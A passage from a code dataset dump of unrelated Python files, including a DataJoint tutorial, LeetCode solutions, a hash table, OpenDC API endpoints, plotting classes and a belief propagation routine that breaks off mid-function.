DataPoint(dj.Part):\n definition = \"\"\"\n # Collected data.\n -> Set\n datapoint : int\n -----\n x : float\n y : float\n \"\"\"\n\n def _make_tuples(self, key):\n # Note that Imported and Computed (below) have a function _make_tuples\n # This allows to call a method s.populate() to automatically populate the data with content.\n n = 10\n mu = 0\n sigma = .1\n self.insert1(key)\n # Insert all of our datapoints\n b = []\n for i in range(n):\n b.append(dict(key, datapoint=i, x=i + np.random.normal(mu, sigma), y=2*i + np.random.normal(mu, sigma)))\n self.DataPoint().insert(b)\n\n\n# Datajoint allows to plot an entity relationship diagram. This shows explicitly what we have just described:\n\n# In[5]:\n\n\ndj.ERD(schema)\n\n\n# The different colors indicate different table types. Gray is lookup, green is manual, blue is Imported and red (which we will see below) is computed. This entity relationship diagram describes how data is ultimately organized in the relational database. The next step is the population of the database with data.\n\n# ## 2) Generate content for the database\n\n# The first think to enter into the databse are two experimenters, and their first experiment. With datajoint, we use the method .insert()\n\n# In[6]:\n\n\nExperiment().insert((['Angus',1],['John',1]), skip_duplicates = True)\n\n\n# In[7]:\n\n\nExperiment() #Shows the current content of the database\n\n\n# Now that we have two experiments defined, we can populate the datasets for the experiment. This is done with the .populate() command.\n\n# In[8]:\n\n\nSet().populate()\n\n\n# In[9]:\n\n\nSet() # Now there are two datasets in the database\n\n\n# In[10]:\n\n\nSet().DataPoint() # With a set of datapoints\n\n\n# One of the reasons that datajoint is popular is that it allows users to make SQL queries without even noticing it, e.g.\n\n# In[11]:\n\n\nExperiment() & 'username = \"Angus\"'\n\n\n# # 3) Compute in the database.\n\n# First, we add a new table to the database that fits a line\n\n# In[12]:\n\n\n@schema\nclass Fitparameters(dj.Computed):\n definition = \"\"\"\n # calculates the fitparameters\n -> Set\n -----\n slope : float\n offset: float\n \"\"\"\n def _make_tuples(self, key):\n data = (Set().DataPoint() & key)\n x, y = data.fetch('x','y')\n slope, intercept, r_value, p_value, std_err = stats.linregress(x,y)\n self.insert1(dict(key, slope = slope, offset = intercept))\n\n\n# Check that it appeared in the entity relationship diagram:\n\n# In[13]:\n\n\ndj.ERD(schema)\n\n\n# After the definition we can call the populate function and read out the results\n\n# In[14]:\n\n\nFitparameters().populate()\nFitparameters()\n\n\n# If you use a database management tool, like Sequel Pro, or you connect to the database, you should be able to see the data directly.\n\n# In[ ]:\n\n\n\n\n","sub_path":"problem_3/datajoint_example.py","file_name":"datajoint_example.py","file_ext":"py","file_size_in_byte":4774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"329384027","text":"# Copyright 2012-2013 Pierre de Buyl\n#\n# This file is part of pyh5md\n#\n# pyh5md is free software and is licensed under the modified BSD license (see\n# LICENSE file).\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pyh5md\n\n# Open a H5MD file\nf = pyh5md.H5MD_File('walk_1d.h5', 'r')\nf.check()\n\n# Open a trajectory group\npart = f.particles_group('particles')\n\n# Open trajectory position data element in the trajectory group\npart_pos = part.trajectory('position')\n\n# Get data and time\nr = part_pos.value\nr_time = part_pos.time\n\n# Compute the MSD\n# The sum over \"axis=2\" is over the spatial components of the positions\nmsd = ((r - r[0])**2).sum(axis=2)\n\n# Compute the mean and standard deviation (particle-wise)\nmsd_mean = msd.mean(axis=1)\nmsd_std = msd.std(axis=1)\n\n# Display the MSD and \nplt.plot(r_time, msd_mean, 'k-', label=r'$\\langle [{\\bf r}(t)-{\\bf r}(0)]^2\\rangle$')\nplt.plot(r_time, msd_mean+msd_std, 'k:', label=r'$\\langle [{\\bf r}(t)-{\\bf r}(0)]^2\\rangle \\pm \\sigma$')\nplt.plot(r_time, msd_mean-msd_std, 'k:')\nplt.xlabel(r'$t$')\nplt.xlabel(r'$t$')\nplt.legend()\n\n# Create a new figure\nplt.figure()\n\n# Obtain and plot the center_of_mass observable\nobs_com = f.observable('center_of_mass')\nplt.plot(obs_com.time, obs_com.value, 'k-')\nplt.xlabel(r'$t$')\nplt.ylabel(r'center of mass')\n\n# Close the file\nf.close()\n\nplt.show()\n","sub_path":"examples/random_walk_1d_analysis.py","file_name":"random_walk_1d_analysis.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"586539338","text":"print(' --- LOJAS ---')\ncont = 's'\nvalor = totalGasto = preAlto = totAlto = menor =contProduto = 0\nnomeMenor = ''\nwhile cont == 's':\n #Detalhes do produto\n nome = input('Descrição produto: ')\n valor = float(input('Valor: '))\n #Total Gasto\n totalGasto += valor\n contProduto += 1\n #Valores maior de 1.000,00\n if valor>1000:\n totAlto += 1\n if valor>preAlto:\n preAlto = valor\n #Menor preço do produto\n if contProduto ==1:\n menor = valor\n nomeMenor = nome\n elif valor List[List[int]]:\n def back(subset, start, target):\n if target<0:\n return \n elif target==0:\n res.append(subset[:])\n for i in range(start, len(nums)):\n subset.append(nums[i])\n back(subset, i, target-nums[i])\n subset.pop()\n \n res = []\n back([], 0, target)\n return res\n","sub_path":"39. Combination Sum.py","file_name":"39. Combination Sum.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"234448719","text":"import cv2\nimport numpy as np\n\ndef fill_square(grid,step,col,row,color):\n # Determine the corners\n left_x = (step + 1) * (col) + 1\n right_x = (step + 1) * (col + 1) - 1\n top_y = (step + 1) * (row) + 1\n bottom_y = (step + 1) * (row + 1) - 1\n\n corners = np.asarray(\n [(left_x, top_y),\n (right_x, top_y),\n (right_x, bottom_y),\n (left_x, bottom_y)]\n )\n\n # Fill in the central point\n cv2.fillConvexPoly(grid, corners, color)\n\n return grid\n\n\n# Parameters\njpg_offset_row = 3\njpg_offset_col = 6\n\nstep = 10\nout_size = 400\n\nline_color = (0, 255, 255)\ncenter_color = (0, 0, 255)\n\n# Initialize white background\ngrid = np.ones((step*8+9, step*8+9, 3), np.uint8)*255\n\n# Create the grid\nfor idx in range(9):\n ctr = (step+1)*idx\n grid[:, ctr] = 0\n grid[ctr, :] = 0\n\n# Fill line and column\nfor col in range(8):\n grid = fill_square(grid, step, col, jpg_offset_row, line_color)\nfor row in range(8):\n grid = fill_square(grid, step, jpg_offset_col, row, line_color)\n\n# Fill the center\ngrid = fill_square(grid, step, jpg_offset_col, jpg_offset_row, center_color)\n\ngrid = cv2.resize(grid, (out_size, out_size), interpolation=cv2.INTER_NEAREST)\n\ncv2.imshow('test', grid)\ncv2.waitKey(-1)","sub_path":"s1_fill_grid.py","file_name":"s1_fill_grid.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"15535452","text":"# Chase Watson\n\nclass HashTable:\n def __init__(self):\n self.size = 256\n self.table = [[] for _ in range(self.size)]\n\n # For the hashing function, we get the ASCII value of each\n # character in the pair and mod that with the table size.\n # Since the Hash Table is initialized as a list of lists,\n # similar pairs would be mapped to the same entry in the table\n def _get_hash(self, key):\n hash = 0\n # To prevent 'be' and 'eb' from existing in the same sublist,\n # we grab the ASCII value of the first element in the string\n # and add it to the resulting hash value before it is modded\n temp = ord(key[0])\n for char in str(key):\n hash += ord(char)\n hash += temp\n return hash % self.size\n\n def add(self, key):\n # Get the index of the entry using the hash function\n key_hash = self._get_hash(key)\n key_value = [key]\n # Check to see if the cell in the table is empty or not\n if self.table[key_hash] is None:\n # Might make list of a list of a list here, might change\n self.table[key_hash] = list([key_value])\n return True\n else:\n # Collision handling done here\n # Check to see if items already in cell are same as current pair\n for value in self.table[key_hash]:\n # If true, append\n if key_value == value:\n self.table[key_hash].append(key_value)\n return True\n # If false, use linear probing to handle collisions\n else:\n entrySize = 0\n new_value = []\n\n # To prevent out-of-range errors\n if key_hash == self.size - 1:\n new_hash = 0\n else:\n new_hash = key_hash + 1\n\n # Get size of entry in hash table\n for i in self.table[new_hash]:\n entrySize += 1\n new_value = [i[0]]\n\n # Check if value within the entry at new_hash is the same as the current key_value\n if key_value == new_value:\n self.table[new_hash].append(key_value)\n return True\n\n # If next hash table entry is empty, insert\n elif entrySize == 0:\n self.table[new_hash].append(key_value)\n return True\n\n # Otherwise, we continue through hash table until we find a match or empty entry\n else:\n while entrySize != 0:\n entrySize = 0\n\n if new_hash == self.size - 1:\n new_hash = 0\n else:\n new_hash += 1\n\n for i in self.table[new_hash]:\n entrySize += 1\n new_value = [i[0]]\n\n if key_value == new_value:\n self.table[new_hash].append(key_value)\n return True\n\n self.table[new_hash].append(key_value)\n return True\n\n self.table[key_hash].append(key_value)\n return True\n\n def get(self, key):\n current = self.table[key]\n if current is not None:\n # Might not work properly, might change\n return current\n return None\n\n def delete(self, key, hash):\n if self.table[hash] is None:\n return False\n else:\n # Similar to append, might change if add doesn't work\n self.table[hash].pop()\n return True","sub_path":"Hash.py","file_name":"Hash.py","file_ext":"py","file_size_in_byte":3876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"159245961","text":"class Solution(object):\n def canJump(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: bool\n \"\"\"\n x = len(nums)\n if x == 0: return False\n i = 0\n rightb = 0\n while i <= rightb:\n rightb = max(rightb, nums[i]+i)\n i += 1\n if rightb >= len(nums)- 1:\n return True\n return False ","sub_path":"Python/leetcode.055.jump-game.py","file_name":"leetcode.055.jump-game.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"394315030","text":"from opendc.models.scenario import Scenario\nfrom opendc.models.portfolio import Portfolio\nfrom opendc.util.rest import Response\n\n\ndef GET(request):\n \"\"\"Get this Scenario.\"\"\"\n\n request.check_required_parameters(path={'scenarioId': 'string'})\n\n scenario = Scenario.from_id(request.params_path['scenarioId'])\n\n scenario.check_exists()\n scenario.check_user_access(request.google_id, False)\n\n return Response(200, 'Successfully retrieved scenario.', scenario.obj)\n\n\ndef PUT(request):\n \"\"\"Update this Scenarios name.\"\"\"\n\n request.check_required_parameters(path={'scenarioId': 'string'}, body={'scenario': {\n 'name': 'string',\n }})\n\n scenario = Scenario.from_id(request.params_path['scenarioId'])\n\n scenario.check_exists()\n scenario.check_user_access(request.google_id, True)\n\n scenario.set_property('name',\n request.params_body['scenario']['name'])\n\n scenario.update()\n\n return Response(200, 'Successfully updated scenario.', scenario.obj)\n\n\ndef DELETE(request):\n \"\"\"Delete this Scenario.\"\"\"\n\n request.check_required_parameters(path={'scenarioId': 'string'})\n\n scenario = Scenario.from_id(request.params_path['scenarioId'])\n\n scenario.check_exists()\n scenario.check_user_access(request.google_id, True)\n\n scenario_id = scenario.get_id()\n\n portfolio = Portfolio.from_id(scenario.obj['portfolioId'])\n portfolio.check_exists()\n if scenario_id in portfolio.obj['scenarioIds']:\n portfolio.obj['scenarioIds'].remove(scenario_id)\n portfolio.update()\n\n old_object = scenario.delete()\n\n return Response(200, 'Successfully deleted scenario.', old_object)\n","sub_path":"api/opendc/api/v2/scenarios/scenarioId/endpoint.py","file_name":"endpoint.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"476987218","text":"\"\"\"\nProcess some integers.\n\nusage: 2_docopt.py [-h] [--agg AGG] N [N ...] \n\npositional arguments:\n N an integer for the accumulator\n\noptional arguments:\n -h, --help show this help message and exit\n --agg AGG aggregation function [default: sum]\n\"\"\"\nfrom docopt import docopt\n\nimport os, json\n\ncli_arguments = docopt(__doc__, version='Utility 20.0')\n\n# Implement rc file\nrc_file_name = \".foorc\"\nrc_arguments = {}\nif os.path.exists(rc_file_name):\n print(f\"Loading runtime config from {rc_file_name} file\")\n with open(rc_file_name) as f:\n rc_arguments = json.load(f)\nelse:\n print(f\"Locally you can use {rc_file_name} file to avoide typing all flags and arguments every time\")\n print(f\"Simply copy the following config to {rc_file_name} to get started\")\n print(cli_arguments)\n\n## Most basic merge strategy (it can be naive in some cases)\narguments = {**cli_arguments, **rc_arguments}\nprint(arguments)","sub_path":"example_build_better_cli/4_rc_file.py","file_name":"4_rc_file.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"32183749","text":"import copy\n\nfrom infra import timing, stored_animations\nfrom led_objects.objects_selector import get_elements\n\n\nclass Animation:\n\n def __init__(self):\n self.timing = None\n self.repeat_params = None\n if stored_animations.is_recording():\n self.repeat_params = stored_animations.get_recording_timing()\n else:\n self.set_timing()\n self.segments = None\n self.stored_elements = None\n\n def to_json_obj(self):\n\n json_obj = {\n \"t\": self.name,\n \"p\": self.segments if len(self.segments) != 1 else self.segments[0],\n \"s\": self.timing.get_start_time_ms(),\n \"e\": self.timing.get_end_time_ms(),\n \"params\": self.get_params_json()\n }\n\n if self.timing.repeats:\n cycle_beats = self.timing.cycle_beats\n json_obj[\"rep_s\"] = self.timing.get_cycle_beat_rel_start()\n json_obj[\"rep_e\"] = self.timing.get_cycle_beat_rel_end()\n json_obj[\"rep_num\"] = self.timing.repeats\n\n if self.repeat_params:\n total_beats = self.timing.number_of_beats()\n curr_length_in_beats = self.repeat_params[\"curr_length_beats\"]\n if not curr_length_in_beats:\n curr_length_in_beats = total_beats\n json_obj[\"rep_s\"] = self.repeat_params[\"repeat_start_beat\"] / float(curr_length_in_beats)\n json_obj[\"rep_e\"] = self.repeat_params[\"repeat_end_beat\"] / float(curr_length_in_beats)\n num_repeat = total_beats / curr_length_in_beats\n json_obj[\"rep_num\"] = num_repeat\n return json_obj\n\n def set_timing(self):\n \"\"\" capture the current timing \"\"\"\n self.timing = timing.get_timing()\n\n def apply(self):\n\n elements_to_apply = get_elements() if not self.stored_elements else self.stored_elements\n if stored_animations.is_recording():\n self.stored_elements = elements_to_apply\n stored_animations.store_animation(self)\n else:\n if not elements_to_apply:\n raise Exception(\"animation has no led objects to take effect on\")\n\n leds_segment = {}\n for segment_proxy in elements_to_apply:\n if segment_proxy.led_object not in leds_segment:\n leds_segment[segment_proxy.led_object] = []\n leds_segment[segment_proxy.led_object].append(segment_proxy.segment_name)\n\n for led_object, segments in leds_segment.items():\n self.segments = segments\n led_object.add_for_segment(segments, copy.deepcopy(self))\n\n def create_from_template(self):\n self.timing = timing.get_timing()\n self.apply()","sub_path":"animations/animation.py","file_name":"animation.py","file_ext":"py","file_size_in_byte":2714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"391397041","text":"sArr = [\"aabbaccc\",\n \"ababcdcdababcdcd\",\n \"abcabcdede\",\n \"abcabcabcabcdededededede\",\n \"xababcdcdababcdcd\"]\n\n# s = sArr[0]\n# unit = int(len(s)/2)\n# unit\n# prev = s[0:unit]\n# prev\n# curr = s[unit : unit + unit]\n# prev == curr\n\n# s = sArr[4]\n# unit = int(len(s)/2)\n# unit\n# prev = s[0:unit]\n# prev\n# curr = s[unit : unit + unit]\n# prev == curr\n# prev = s[1:unit + 1]\n# prev\n# curr = s[unit + 1: unit + unit + 1]\n# curr\n# prev == curr\n\n[i for i in range(0, 7, 3)]\n\ns = sArr[4]\nunit = int(len(s)/2)\nunit\n\nlen(s) - 2 * unit\n[i for i in range(0, len(s) - 2 * unit + 1, 1) ]\n\nfor i in range(0, len(s) - 2 * unit + 1, 1) :\n prev = s[0 + i : unit + i]\n curr = s[unit + i : unit * 2 + i]\n unit if prev == curr else None\n\ns = sArr[3]\ns\nhalf = int(len(s)/2)\nhalf\n\nfor i in range(half, 0, -1):\n unit = i\n cnt = 0\n for j in range(0, len(s) - unit * 2 + 1, unit) :\n start = j\n for k in range(0, len(s) % unit + 1, 1):\n shift = k\n prev = s[start + shift: start + shift + unit]\n prev1 = (start + shift, start + shift + unit)\n curr = s[start + shift + unit: start + shift + unit * 2 ]\n curr1 = (start + shift + unit, start + shift + unit * 2)\n 'prev, curr = ({}, {})'.format(prev1, curr1)\n 'prev, curr = ({}, {})'.format(prev, curr)\n cnt = cnt + 1 if prev == curr else 0\n '{}, {}'.format(curr, cnt + 1) if cnt != 0 else None\n\n\n\n[i for i in range(half, 0, -1)]\nlen(s)\nunit = 10\n[j for j in range(0, len(s) % unit, 1)]\nshift = 4\n[(k, k + unit) for k in range(0 + shift, len(s) - unit + 1, unit)]\n\n\n\n[(r, r + 2) for r in range(0, len(\"abcabcabcabc12dczczczcz\"), 2)][0]\nr = [7, 9, 8, 14, 7]\n\ns[0]\ns[1]\ns[2]\ns[3]\ns[4]\n\n# [관찰된 사실]\n# aabbccdd => 2a2b2c2d : 연속된 2개의 문자열은 압축 효과 없음\n# aaabbcc => 3a2b2c : 적어도 3개 이상의 문자열이 연속되어야 압축 효과 있음\n# aaabbbaaabbb => 3a3b3a3b (x) / 2aaabbb (o) : 연속된 문자열의 길이가 길수록 압축 효과가 큼\n\n# [순회방법]\n\n\n# int는 소수점 자리수를 버림\n\n\nword = s[0]\nlen(word)\n\nif len(word) % 2 == 0:\n half = int(len(word)/ 2)\n\nhalf\n\nword = word[0:half]\nword\n","sub_path":"2019-2020_programmers/_03_/src/python/string_compression.py","file_name":"string_compression.py","file_ext":"py","file_size_in_byte":2212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"558637897","text":"\"\"\"\\\nwxListBox widget configuration\n\n@copyright: 2014-2016 Carsten Grohmann\n@license: MIT (see LICENSE.txt) - THIS PROGRAM COMES WITH NO WARRANTY\n\"\"\"\n\nconfig = {\n 'wxklass': 'wxListBox',\n 'style_defs': {\n 'wxLB_SINGLE': {\n 'desc': _('Single-selection list.'),\n 'exclude': 'wxLB_EXTENDED|wxLB_MULTIPLE',\n },\n 'wxLB_MULTIPLE': {\n 'desc': _('Multiple-selection list: the user can toggle multiple '\n 'items on and off. This is the same as wxLB_EXTENDED '\n 'in wxGTK2 port.'),\n 'exclude': 'wxLB_EXTENDED|wxLB_SINGLE',\n },\n 'wxLB_EXTENDED': {\n 'desc': _('Extended-selection list: the user can extend the '\n 'selection by using SHIFT or CTRL keys together with '\n 'the cursor movement keys or the mouse.'),\n 'exclude': 'wxLB_SINGLE|wxLB_MULTIPLE',\n },\n 'wxLB_HSCROLL': {\n 'desc': _('Create horizontal scrollbar if contents are too wide '\n '(Windows only).'),\n },\n 'wxLB_ALWAYS_SB': {\n 'desc': _('Always show a vertical scrollbar.'),\n },\n 'wxLB_NEEDED_SB': {\n 'desc': _('Only create a vertical scrollbar if needed.'),\n },\n 'wxLB_NO_SB': {\n 'desc': _(\"Don't create vertical scrollbar (wxMSW only).\"),\n 'supported_by': ('wx3',),\n },\n 'wxLB_SORT': {\n 'desc': _('The listbox contents are sorted in alphabetical order.')\n },\n },\n 'default_style': 'wxLB_SINGLE',\n 'style_list': ['wxLB_SINGLE', 'wxLB_MULTIPLE', 'wxLB_EXTENDED',\n 'wxLB_HSCROLL', 'wxLB_ALWAYS_SB', 'wxLB_NEEDED_SB',\n 'wxLB_NO_SB', 'wxLB_SORT'],\n 'events': {\n 'EVT_LISTBOX': {},\n 'EVT_LISTBOX_DCLICK': {},\n },\n}\n\n\n\n","sub_path":"widgets/list_box/wconfig.py","file_name":"wconfig.py","file_ext":"py","file_size_in_byte":1885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"370161955","text":"import tensorflow as tf\r\n\r\na = tf.placeholder(\"float\")\r\nb = tf.placeholder(\"float\")\r\nadd_op = tf.add(a, b)\r\nmul_op = tf.multiply(a, b)\r\nadd_op1 = a + b\r\nmul_op1 = a * b\r\n\r\noutput_array = [[add_op, mul_op]]\r\n\r\nwith tf.Session() as sess:\r\n output_array = sess.run(output_array, feed_dict={a: 1, b: 2})\r\n print(output_array)\r\nprint ()","sub_path":"samples-labs-exercises/samples/neurons/yc/tiger_tensorboard_log1.py","file_name":"tiger_tensorboard_log1.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"263482641","text":"\"\"\"For generating plots from simulation data\"\"\"\n\n#Standard library\nfrom __future__ import print_function, division #Python 2 compatibility\nimport os\nimport os.path as osp\nimport sys\n\n#Site packages\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n#Local\nimport folderstructure as FS\nimport common\nimport simulator_general\nimport collect_results\n\nclass PlotSeries(common.ParameterSet):\n \"\"\"Data for a single series on a plot\n\n Attributes:\n\n - xvals = array of x-values\n - yvals = array of y-values\n - label = legend label\n - metadata = other parameters needed to identify the data series\n \"\"\"\n __slots__=['xvals','yvals','label','metadata']\n def add_to_axes(self,ax,fmt,**kwd):\n \"\"\"Plot this series on the specified axes\n\n This is a wrapper for ax.plot\n\n Arguments:\n\n - ax = matplotlib Axes object\n - fmt = matplotlib format string\n - \\**kwd = other keyword arguments for Axes.plot\n\n Returns:\n\n - The result of call to ax.plot\"\"\"\n return ax.plot(self.xvals,self.yvals,fmt,label=self.label,**kwd)\n\nclass PlotFigure(common.ParameterSet):\n \"\"\"Data for a single matplotlib figure\n\n This is for a plot with a single set of axes.\n\n Attributes:\n\n To be read in from yaml file:\n\n - figsize = pair of numbers representing figure size, in inches: (Width, Height)\n - filename = name of the output file to be created, as string\n - prepfunctions = sequence of method calls used to generate additional data, etc.\n\n The available method names usually start with 'prep_'\n\n - plotfunctions = sequence of method calls used to generate plot\n\n The available method names usually start with 'plot_'\n\n - xlabel = x-axis label, as string\n - ylabel = y-axis label, as string\n - title = plot title, as string\n - fmts = list of format specifier strings\n\n To be created by methods:\n\n - datafiles = dictionary of loaded data files\n - outfpath = path to output file\n - series = sequence of PlotSeries instances\n - fig = matplotlib Figure for the generated plot\n - ax = matplotlib Axes for the plot\n - info = dictionary of miscellaneous data\"\"\"\n __slots__=['figsize','filename','prepfunctions','plotfunctions','xlabel','ylabel','title','fmts','outfpath','datafiles','series','fig','ax','info']\n _config_attrs=['figsize','filename','prepfunctions','plotfunctions','xlabel','ylabel','title','fmts']\n _outputfile_attrs=['outfpath']\n _taskname_src_attr='outfpath'\n \n def __init__(self,**kwd):\n #Initialization from base class\n super(PlotFigure, self).__init__(**kwd)\n #Find the input and output files\n self.locate_data()\n self.outfpath=osp.join(self.outdir(),self.filename)\n\n @property\n def _more_inputfiles(self):\n return list(self.datafiles.values())\n \n def execute_commandseq(self,attrname):\n \"\"\"Execute the command sequence\n\n Arguments:\n\n - attrname = name of attribute containing the command sequence\"\"\"\n if getattr(self,attrname,None) is not None:\n for cmd in getattr(self,attrname,[]):\n #Function name and arguments\n funcname, kwargs = cmd\n #Call it\n try:\n getattr(self,funcname)(**kwargs)\n except Exception as einst:\n print(\"Excption occured for command: %s\"%str(cmd), file=sys.stderr)\n raise einst\n \n def run(self):\n \"\"\"Create the plot.\"\"\"\n print(self.outfpath)\n \n #Load the data we need to generate the plot\n self.load_data()\n \n #Initialize the figure at the size requested\n self.fig = plt.figure(figsize=self.figsize)\n \n #Get the axes\n self.ax=self.fig.gca()\n \n #Call the preparation functions\n self.execute_commandseq('prepfunctions')\n \n #Add the available series to the axes\n self.plot_basic_series()\n \n #Call the requested plot functions\n self.execute_commandseq('plotfunctions')\n \n #Save the figure\n if not osp.isdir(self.outdir()):\n os.makedirs(self.outdir())\n self.fig.savefig(self.outfpath)\n \n #Close the figure\n plt.close(self.fig)\n \n #Done\n return\n\n def plot_basic_series(self):\n \"\"\"A simple plot.\"\"\"\n for i,sr in enumerate(self.series):\n o=sr.add_to_axes(self.ax,self.fmts[i])\n if getattr(self,'title',None) is not None:\n o=self.ax.set_title(self.title)\n if getattr(self,'xlabel',None) is not None:\n o=self.ax.set_xlabel(self.xlabel)\n if getattr(self,'ylabel',None) is not None:\n o=self.ax.set_ylabel(self.ylabel)\n return \n\n def plot_axmethod(self,method,kwargs=None):\n \"\"\"Call a method of the axes.\n\n Arguments:\n\n - method = name of Axes method to call, as string\n - kwargs = arguments dictionary for the method\"\"\"\n f=getattr(self.ax,method)\n if kwargs is None:\n kwargs = {}\n f(**kwargs)\n return\n\n def plot_hline(self,locspec,kwargs=None):\n \"\"\"Add a horizontal line with a value from info\n\n Arguments:\n\n - locspec = sequence of keys in the info dictionary to locate the y-value\n - kwargs = keyword arguments for ax.axhline\"\"\"\n yval=common.nested_location(self.info,locspec)\n if kwargs is None:\n kwargs = {}\n self.ax.axhline(yval,**kwargs)\n return\n\n def plot_vline(self,locspec,kwargs=None):\n \"\"\"Add a vertical line with a value from info\n\n Arguments:\n\n - locspec = sequence of keys in the info dictionary to locate the x-value\n - kwargs = keyword arguments for ax.axvline\"\"\"\n xval=common.nested_location(self.info,locspec)\n if kwargs is None:\n kwargs = {}\n self.ax.axvline(xval,**kwargs)\n return\n\n\nclass ModelPlotFigure(PlotFigure):\n \"\"\"Data for a single model plot\n\n Attributes:\n\n To be read in from yaml file:\n\n - plotname = plot name in outdata file holding data series\n - modelname = name of model\n\n To be created by methods:\n\n (none)\"\"\"\n __slots__=['plotname','modelname']\n _config_attrs=PlotFigure._config_attrs+['plotname','modelname']\n\n def outdir(self):\n return osp.join(FS.postprocfolder,self.basename,self.modelname)\n\n def datadir(self):\n return osp.join(FS.solnfolder,self.basename,self.modelname)\n\n def locate_data(self):\n datadir=self.datadir()\n self.datafiles={'pklfile':osp.join(datadir,'outdata.pkl'), 'infofile':osp.join(datadir,FS.infofile)}\n\n def load_data(self):\n \"\"\"Load the data for the plot.\"\"\"\n \n #Load the data series\n outdata=simulator_general.OutData.from_pickle(self.datafiles['pklfile'])\n self.series=outdata.plots[self.plotname]\n \n #Load the info\n self.info=common.readyaml(self.datafiles['infofile'])\n \n return\n\nclass CollectionPlotFigure(PlotFigure):\n \"\"\"Data for a single collection plot\n\n Attributes:\n\n To be read in from yaml file:\n\n - calcfunctions = sequence of calculation functions to be called before generating plot\n - seriesdefs = sequence of series definitions (xcol, ycol, label),\n where the columns specify the DataFrame columns containing values for the series.\n The label is optional.\n\n To be created by methods:\n\n - df = the DataFrame\"\"\"\n __slots__=['calcfunctions','seriesdefs','df']\n _config_attrs=PlotFigure._config_attrs+['calcfunctions','seriesdfs']\n\n def outdir(self):\n return osp.join(FS.postprocfolder,self.basename)\n\n def locate_data(self):\n self.datafiles={'dataframe': osp.join(FS.postprocfolder,self.basename,collect_results.collected_df_fname)}\n\n def load_data(self):\n \"\"\"Load the data for the plot.\"\"\"\n #Load the DataFrame\n self.df=pd.read_pickle(self.datafiles['dataframe'])\n \n #Initialize empty info\n self.info={}\n \n #Do the requested calculations to add new columns\n self.execute_commandseq('calcfunctions')\n \n #Add the requested columns in as series\n self.series=[]\n for sdef in self.seriesdefs:\n assert len(sdef) >= 2, \"Inadequate series definition: %s\"%str(sdef)\n if len(sdef)>3 and len(sdef[3])>0:\n qdf=self.df.query(sdef[3])\n else:\n qdf=self.df\n sdef_dict={'xvals':qdf[sdef[0]],'yvals':qdf[sdef[1]]}\n if len(sdef)>2:\n sdef_dict['label']=sdef[2]\n else:\n sdef_dict['label']=''\n self.series.append(PlotSeries(**sdef_dict))\n \n return\n\n def calc_Dratio(self):\n def calc_ratio(row):\n return row['Deff']/row['D_bulk']\n self.df['ratio_D']=self.df.apply(calc_ratio,axis=1)\n return\n\n def prep_series_equality(self):\n pdser=self.df['free_volume_frac']\n vals=[pdser.min(),pdser.max()]\n ser=PlotSeries(xvals=vals,yvals=vals,label=\"1:1\")\n self.series.append(ser)\n return","sub_path":"NSF/Tom/src/plotdata.py","file_name":"plotdata.py","file_ext":"py","file_size_in_byte":8595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"124816836","text":"import numpy as np\n\n\ndef ep(edge_potential, i, j, var_i, var_j):\n if (i, j) in edge_potential:\n return edge_potential[(i, j)][var_i, var_j]\n elif (j, i) in edge_potential:\n return edge_potential[(j, i)][var_j, var_i]\n else:\n return None\n\n\ndef get_msg(i, j, node_potential, edge_potential, messages, neighbors, normalize=True):\n # get msg_{i->j}(var)\n distant_msg = {0: 1, 1: 1}\n for k in neighbors[i]:\n if k != j:\n distant_msg[0] *= messages[(k, i)][0]\n distant_msg[1] *= messages[(k, i)][1]\n\n msg = {}\n msg[0] = node_potential[i][0] * ep(edge_potential, i, j, 0, 0) * distant_msg[0] \\\n + node_potential[i][1] * ep(edge_potential, i, j, 1, 0) * distant_msg[1]\n msg[1] = node_potential[i][0] * ep(edge_potential, i, j, 0, 1) * distant_msg[0] \\\n + node_potential[i][1] * ep(edge_potential, i, j, 1, 1) * distant_msg[1]\n\n if normalize:\n s = msg[0] + msg[1]\n msg[0] /= s\n msg[1] /= s\n\n return msg\n\n\ndef normalize_marginals(marginals):\n for node in marginals:\n p_sum = marginals[node][0] + marginals[node][1]\n marginals[node][0] /= p_sum\n marginals[node][1] /= p_sum\n\n\ndef belief_propagation(node_potential, edge_potential, diameter=np.inf):\n '''\n node_potential: {i -> node_potential}\n edge_potential: {(i, j) -> edge_potential}\n output: {i -> marginal}\n '''\n \n # find neighbor nodes for each node\n neighbors = {}\n for i in node_potential:\n neighbors[i] = set()\n for (i, j) in edge_potential:\n neighbors[i].add(j)\n neighbors[j].add(i)\n\n # initialize random message\n messages = {}\n init_msg = {0: 1, 1: 1}\n for (i, j) in edge_potential:\n messages[(i, j)] = init_msg\n messages[(j, i)] = init_msg\n\n diam = min(diameter, len(node_potential))\n\n # tree diameter <= total number of nodes\n for _ in range(diam):\n new_messages = {}\n for i in node_potential:\n for j in neighbors[i]:\n msg = get_msg(\n i, j,\n node_potential,\n edge_potential,\n messages,\n 